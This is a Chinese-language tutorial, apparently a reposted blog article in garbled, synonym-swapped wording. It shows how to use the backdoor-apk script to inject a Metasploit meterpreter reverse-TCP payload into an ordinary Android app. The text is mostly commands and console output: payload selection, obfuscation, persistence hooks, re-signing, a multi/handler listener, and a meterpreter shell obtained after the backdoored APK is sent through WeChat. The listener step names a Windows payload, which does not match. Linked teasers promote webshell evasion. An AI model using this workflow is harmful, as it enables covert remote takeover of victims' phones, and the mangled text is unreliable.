backdoor
backdoor-apk是一个shell脚本 *** ,它简单化了向一切Android APK文档加上木马程序的全过程。此shell脚本 *** 的客户应具备Linux,Bash,Metasploit,Apktool,Android SDK, *** ali等的工作中专业知识。此shell脚本 *** 按原状出示,不出示一切方式的贷款担保,仅用以文化教育目地。
通俗化的讲:backdoor-apk 从姓名上大家就能了解它的主要用途了,没有错便是用于制做 APK 侧门的。这款专用工具应用起來十分便捷,并且作用也很强劲!话不多说,下边大家直接进入主题。
特别提示:原文中谈及的一部分技术性仅作安全学习和课堂教学主要用途,严禁不法应用!
1、更先,使我们对它开展安裝,在安裝前大家必须先安裝它的一些依靠 lib 库文件:
apt-get install lib32stdc 6 lib32ncurses5 lib32z1
2、这儿了解大家,对这种安裝的服务项目,当她们升级时已不开展了解。大家挑选 Yes 就可以!
在进行之上依靠库的安裝后然后大家就可以安裝 backdoor-apk 啦!
backdoor-apk 免费下载、安裝、使用 ***
1、免费下载backdoor-apk
我是立即用的git下载backdoor-apk,其他 *** 还可以,比如:wget;
git clone https://github.com/dana-at-cp/backdoor-apk.git
2、免费下载进行后大家进到到其文件名称下:
cd backdoor-apk/
3、在当前目录下,我们可以见到一个脚本文件。
需注意:大家必须准备充分一个用于关联侧门的apk文件。
./backdoor-apk.sh /root/secist.apk
挑选 3 payload
LHOST:192.168.15.131
LPORT:4444
4、Android明细管理权限选择项:
[ ] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
怎么知道侧门APK是不是转化成 取得成功?
下列操作流程就算是取得成功!
[email protected]:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie
[*] Running backdoor-apk.sh v0.2.3 on Mon Oct 9 16:50:06 EDT 2017
[ ] Android payload options:
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[ ] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[ ] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[ ] Keeping permissions of original project
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT *** ali files...done.
[*] Copying RAT *** ali files to new directories in original project...done.
[*] Fixing RAT *** ali files...done.
[*] Obfuscating const-string values in RAT *** ali files...done.
[*] Locating *** ali file to hook in original project...done.
[*] Adding hook in original *** ali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[email protected]:~/Code/github/backdoor-apk/backdoor-apk#
5、取得成功实行之上实际操作后,会转化成一个关联侧门的 secist.apk 文档,默认设置被储存在 backdoor-apk>>original>>dist 文件目录下!下边大家来起动监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.131
set lport 4444
exploit
6、另外,我将转化成的含有侧门的 APK 发送到我的微信,并开展安裝开启!
7、迅速我们可以见到,我已经获得了手机上的 meterpreter shell !
简易键入一个,查询系统信息的指令:
sysinfo能够见到总体目标系统软件为 安卓6 版本号,核心为 linux 3.10.49 构架为 armv7l 。
相关文章
dSniff的典型性主要用途是啥?
什么叫dSniff? dSniff是由Dug Song建立的数据流量剖析和登陆密码嗅探工具,用以分析各种各样运用协议书并获取有关数据信息。dsniff,mailsnarf,filesnarf,msg...
全新提权免杀asp木马病毒
一个能够绕开当今目前市面上基本上全部Webshell查杀的免杀PHP一句话木马脚本制作。...
Autopsy汉语翻译回来也叫“验尸”;什么叫验尸?-
Autopsy 汉语翻译回来也叫“验尸”; 什么叫验尸? 验尸是一种在GUI工作环境的数据调查取证服务平台。“The Sleuth Kit(TSK)”库文件的验尸工作中是一组cmd调查...
dedecms找后台和解密注意事项
解密:织梦密码是cmd5加密,为20位,去掉前三位与后一位。 后台:默认的是dede/login.php 有时后台也可以利用http://chncto.com/include/fcke...
Maltego的典型性主要用途是啥?
什么叫Maltego? Maltego由Paterva开发设计,是用以开源系统调查取证和智能化的专用工具。其重中之重是出示一个变换库,用以发觉来源于不一样开源系统的数据信息,并将该大数据可视化为适用...
电脑肉鸡的商业价值_怎样看待电脑肉鸡的价值
电脑肉鸡的商业价值,我们应该怎样看待电脑肉鸡的价值,一起来看看下面的内容吧。 1.盗窃“肉鸡”电脑的虚拟财产 虚拟财产有:网络游戏ID帐号装备、QQ号里的Q币、联众的虚拟荣誉值等等。虚...
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!